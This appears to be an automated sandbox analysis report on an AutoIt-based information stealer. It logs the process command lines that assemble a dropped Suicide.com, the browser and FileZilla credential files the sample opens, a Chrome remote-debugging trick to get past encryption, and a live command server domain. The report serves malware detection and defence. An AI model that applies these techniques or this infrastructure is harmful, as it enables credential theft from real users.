    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue NJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com Suicide.com NJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: Suicide.com, 0000000A.00000000.1702658766.00000000002E6000.00000002.00000001.01000000.00000007.sdmp, Suicide.com.1.dr, Curtis.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

    Remote Access Functionality

    barindex
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    12
    Process Injection
    111
    Masquerading
    2
    OS Credential Dumping
    1
    Security Software Discovery
    Remote Services11
    Input Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    12
    Process Injection
    11
    Input Capture
    3
    Process Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    1
    Remote Access Software
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Extra Window Memory Injection
    1
    Deobfuscate/Decode Files or Information
    Security Account Manager3
    File and Directory Discovery
    SMB/Windows Admin Shares2
    Data from Local System
    1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information
    NTDS14
    System Information Discovery
    Distributed Component Object Model1
    Clipboard Data
    3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA SecretsInternet Connection DiscoverySSHKeylogging4
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Extra Window Memory Injection
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569757 Sample: Yn13dTQdcW.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 40 ikores.sbs 2->40 42 t.me 2->42 44 LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXyb 2->44 56 Multi AV Scanner detection for domain / URL 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Antivirus detection for URL or domain 2->60 62 4 other signatures 2->62 10 Yn13dTQdcW.exe 28 2->10         started        signatures3 process4 process5 12 cmd.exe 3 10->12         started        file6 32 C:\Users\user\AppData\Local\...\Suicide.com, PE32 12->32 dropped 64 Drops PE files with a suspicious file extension 12->64 16 Suicide.com 24 12->16         started        20 cmd.exe 2 12->20         started        22 conhost.exe 12->22         started        24 7 other processes 12->24 signatures7 process8 dnsIp9 34 ikores.sbs 5.75.212.196, 443, 49790, 49796 HETZNER-ASDE Germany 16->34 36 t.me 149.154.167.99, 443, 49784 TELEGRAMRU United Kingdom 16->36 38 127.0.0.1 unknown unknown 16->38 50 Attempt to bypass Chrome Application-Bound Encryption 16->50 52 Tries to harvest and steal ftp login credentials 16->52 54 Tries to harvest and steal browser information (history, passwords, etc) 16->54 26 chrome.exe 16->26         started        signatures10 process11 dnsIp12 46 239.255.255.250 unknown Reserved 26->46 29 chrome.exe 26->29         started        process13 dnsIp14 48 www.google.com 172.217.21.36, 443, 49837, 49838 GOOGLEUS United States 29->48

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Yn13dTQdcW.exe34%ReversingLabs
    Yn13dTQdcW.exe22%VirustotalBrowse
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\402438\Suicide.com3%ReversingLabs
    No Antivirus matches
    SourceDetectionScannerLabelLink
    ikores.sbs15%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://anglebug.com/46330%Avira URL Cloudsafe
    https://anglebug.com/73820%Avira URL Cloudsafe
    https://anglebug.com/77140%Avira URL Cloudsafe
    http://anglebug.com/62480%Avira URL Cloudsafe
    https://issuetracker.google.com/2844622630%Avira URL Cloudsafe
    http://anglebug.com/69290%Avira URL Cloudsafe
    http://anglebug.com/52810%Avira URL Cloudsafe
    https://issuetracker.google.com/2554117480%Avira URL Cloudsafe
    https://anglebug.com/72460%Avira URL Cloudsafe
    https://anglebug.com/73690%Avira URL Cloudsafe
    https://anglebug.com/74890%Avira URL Cloudsafe
    https://drive-daily-2.corp.google.com/0%Avira URL Cloudsafe
    https://ikores.sbs/100%Avira URL Cloudmalware
    https://issuetracker.google.com/1619030060%Avira URL Cloudsafe
    https://drive-daily-1.corp.google.com/0%Avira URL Cloudsafe
    https://drive-daily-5.corp.google.com/0%Avira URL Cloudsafe
    http://anglebug.com/62480%VirustotalBrowse
    https://drive-daily-3.corp.googlP20%Avira URL Cloudsafe
    http://anglebug.com/30780%Avira URL Cloudsafe
    http://anglebug.com/46332%VirustotalBrowse
    https://anglebug.com/73820%VirustotalBrowse
    http://anglebug.com/75530%Avira URL Cloudsafe
    http://anglebug.com/53750%Avira URL Cloudsafe
    http://anglebug.com/53710%Avira URL Cloudsafe
    http://anglebug.com/47220%Avira URL Cloudsafe
    http://anglebug.com/75560%Avira URL Cloudsafe
    https://drive-preprod.corp.google.com/0%Avira URL Cloudsafe
    http://anglebug.com/66920%Avira URL Cloudsafe
    https://issuetracker.google.com/2582074030%Avira URL Cloudsafe
    http://anglebug.com/35020%Avira URL Cloudsafe
    http://anglebug.com/69290%VirustotalBrowse
    http://anglebug.com/36230%Avira URL Cloudsafe
    http://anglebug.com/36250%Avira URL Cloudsafe
    http://anglebug.com/36240%Avira URL Cloudsafe
    http://anglebug.com/50070%Avira URL Cloudsafe
    http://anglebug.com/38620%Avira URL Cloudsafe
    http://anglebug.com/48360%Avira URL Cloudsafe
    https://issuetracker.google.com/issues/1664752730%Avira URL Cloudsafe
    http://anglebug.com/8280ty0%Avira URL Cloudsafe
    http://anglebug.com/43840%Avira URL Cloudsafe
    http://anglebug.com/39700%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    t.me
    149.154.167.99
    truefalse
      high
      www.google.com
      172.217.21.36
      truefalse
        high
        ikores.sbs
        5.75.212.196
        truetrueunknown
        LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXyb
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://ikores.sbs/true
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://duckduckgo.com/chrome_newtabchrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, KFUAIW.10.drfalse
            high
            https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000010.00000002.2725257801.000078C400104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://duckduckgo.com/ac/?q=chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, KFUAIW.10.drfalse
                high
                https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000010.00000002.2724958067.000078C40009C000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://docs.google.com/document/Jchrome.exe, 00000010.00000002.2728286701.000078C4007D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000010.00000002.2726865760.000078C4004D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://anglebug.com/4633chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://anglebug.com/7382chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.9R1D2D.10.drfalse
                          high
                          https://issuetracker.google.com/284462263chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000010.00000002.2728535696.000078C40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728611172.000078C400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731250474.000078C400CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://polymer.github.io/AUTHORS.txtchrome.exe, 00000010.00000003.2660325626.000078C400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660907593.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660364108.000078C401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661059265.000078C400FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660872042.000078C400CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2659915954.000078C401044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661381988.000078C4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661266172.000078C40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660023682.000078C401054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660952834.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660054702.000078C4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726245075.000078C4002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://docs.google.com/chrome.exe, 00000010.00000003.2641552249.000078C4004CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://docs.google.com/document/:chrome.exe, 00000010.00000002.2728286701.000078C4007D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000010.00000002.2729512501.000078C400A23000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2729480786.000078C400A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://anglebug.com/7714chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://google-ohttp-relay-join.fastly-edge.com/ilchrome.exe, 00000010.00000003.2690086393.000078C4015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690031645.000078C4015A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://google-ohttp-relay-join.fastly-edge.com/Hlchrome.exe, 00000010.00000003.2690086393.000078C4015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690031645.000078C4015A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://unisolated.invalid/chrome.exe, 00000010.00000002.2729999238.000078C400A2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000010.00000003.2661381988.000078C4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661266172.000078C40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/chrome/tips/chrome.exe, 00000010.00000002.2729296549.000078C40098C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733175675.000078C400F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728770316.000078C4008B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/?lfhs=2chrome.exe, 00000010.00000002.2728286701.000078C4007D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://anglebug.com/6248chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://anglebug.com/6929chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://anglebug.com/5281chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.youtube.com/?feature=ytcachrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc949R1D2D.10.drfalse
                                                          high
                                                          https://issuetracker.google.com/255411748chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.autoitscript.com/autoit3/JSuicide.com, 0000000A.00000000.1702752376.00000000002F9000.00000002.00000001.01000000.00000007.sdmp, Suicide.com.1.dr, Curtis.0.drfalse
                                                            high
                                                            https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000010.00000002.2728535696.000078C40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728611172.000078C400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731250474.000078C400CB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://anglebug.com/7246chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://anglebug.com/7369chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://anglebug.com/7489chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
